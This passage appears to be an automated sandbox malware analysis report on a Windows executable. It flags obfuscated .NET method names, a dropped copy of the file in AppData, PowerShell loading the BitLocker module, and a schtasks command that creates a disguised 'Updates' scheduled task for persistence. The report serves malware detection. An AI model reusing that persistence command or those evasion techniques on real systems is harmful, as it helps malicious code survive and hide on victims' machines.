Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, JY2qdR96bpxm3G8YfZ.cs	High entropy of concatenated method names: 'vkIbjAQRlZ', 'oENbM4boMA', 'hBdCInvTMb', 'yUFCOa3uyH', 'dNtb7pYF0S', 'OX9byHIkmL', 'rwVbUsomYt', 'ryIbaYT6pO', 'bs2b1yxT4C', 'CQrbQMUqTB'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, bOCTDJOet9LwxgpdbK0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SOqSkNbuvs', 'YVOSx4gE9C', 'MqHSdoAnDs', 'aAwSS40Qks', 'HG2SXhpwoC', 'BrESZDAoFC', 'MyNSvtobsK'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, qBhfO3L1uDBOEPGMeC.cs	High entropy of concatenated method names: 'o4CrRIY9cb', 'fvir8fjMuv', 'S51mWnYha9', 'pFwmP2hAc1', 'gDbmVPg4I9', 'F5MmDTyViE', 'sLtmEgXLyF', 'nQymohxii6', 'XLBmK6vYti', 'cf7mtvvt8R'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, zMGcexhUviBX4Y5L42.cs	High entropy of concatenated method names: 'RCjmuNXuXf', 'uwQmTnbAgS', 'fBKmAqcMPR', 'GEcmhg1fuW', 'uT5mFHXGDv', 'RU4mwfCMPk', 'KmLmbqdM3r', 'fabmCKmR0i', 'Wrdmk2lnEr', 'nAKmx7nb3e'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, O76oEJAdf3ugVbiFUb.cs	High entropy of concatenated method names: 'JKDGaXgWL8', 'mIXG1tyvKe', 'LoAGQX4j1I', 'pDXGBHoEiy', 'cZbGYg9TKa', 'gcVG9S0U4P', 'BlkG3vWh3E', 'hbVGjDTB1H', 'X7LGl8kROF', 'hhHGMnyHT2'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, wnwYX3cihVFWvaiD12.cs	High entropy of concatenated method names: 'eTws5IZXxK', 'DjpsJ6hqCh', 'zklsGPtk8x', 'u35smwsxsA', 'fGSsrD4arJ', 'YWwsNvmy3W', 'sl3sqRXa1y', 'XNHsclhX6P', 'L98sHpCqK8', 'j7us4tmKeI'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, mmYetxOOrsmPb1cXOkI.cs	High entropy of concatenated method names: 'fQdxMhy0oY', 'UJfxzhvUFv', 'uRvdIYXJnR', 'PRMdO1YWEd', 'O2xd0LvlY5', 'bR6ds6CoVe', 'U5ZdenAGjT', 'aE8d5SDHyq', 'zUqdJYFF3i', 'ta3dGsBPcU'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, xnqgyUMf8MwIZeGiwK.cs	High entropy of concatenated method names: 'FtQxmxFnfW', 'dE3xr9KBiP', 'nePxN8fMPe', 'DwWxq0d8BX', 'MMaxkXq740', 'xdYxc2fiFB', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, tqn7OyeQyS8LDTqloR.cs	High entropy of concatenated method names: 'Vm7Oq76oEJ', 'tf3OcugVbi', 'tUvO4iBX4Y', 'eL4O62CBhf', 'IGMOFeCnp6', 'DyLOw7U3XK', 'OFP74Synre5id8rxpq', 'iXy6iNDo7qTdyLK5HY', 'EfnOO8w8ux', 'r19OsNOBP6'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, vJN1IG0PjgicqCTBLR.cs	High entropy of concatenated method names: 'krriUyOev', 'BjBuVDinc', 'JNxTAPs6b', 'GmM8T4Ihs', 'VYihXSZTh', 'XhxLcafQy', 'DA1aLwYNf4ximdHeKq', 'yqQHwunIl8huNWXsNn', 'ROtCWpSQv', 'BLtxNCGuC'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, XTPLjiGI63Hjf2NhwW.cs	High entropy of concatenated method names: 'Dispose', 'dyQOl8kx4X', 'gKm02kYLdX', 'UFwAYHSjNA', 'TvsOMuXI3P', 'KyDOzeDlbU', 'ProcessDialogKey', 'KoN0IKyFLH', 'pET0Ow7Fuf', 'XfC00fnqgy'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, fiiwkjQXHWqqxnfsbX.cs	High entropy of concatenated method names: 'ToString', 'l4Fw7NyfVL', 'dgTw2Thkt0', 'zN5wWtIuap', 'O8pwP3PpY8', 'Fl7wVQeqBN', 'PCcwDXh3mu', 'qrDwE7WkKh', 'n6MwoHqmFc', 'g31wK8Rgqo'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, j5CGaWaak4bmcIKcIp.cs	High entropy of concatenated method names: 'rGxFtHg93L', 'BX9Fyg0YSr', 'CNGFafaSlT', 'BVJF1mU7nJ', 'IhXF2bpPHM', 'QnvFWQDUKS', 'QIoFPeQuYQ', 'vVwFVytCOM', 'mhbFDclkHP', 'sinFEMZFvs'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, ccHPehOIgqlOQNa40ac.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TbPx7nsY1c', 'WvPxynPPBQ', 'wAmxUeIFyH', 'TSLxaqIy3F', 'FF8x15t6HD', 'Wt4xQliIeN', 'd9oxB7UaHj'

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

File created: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
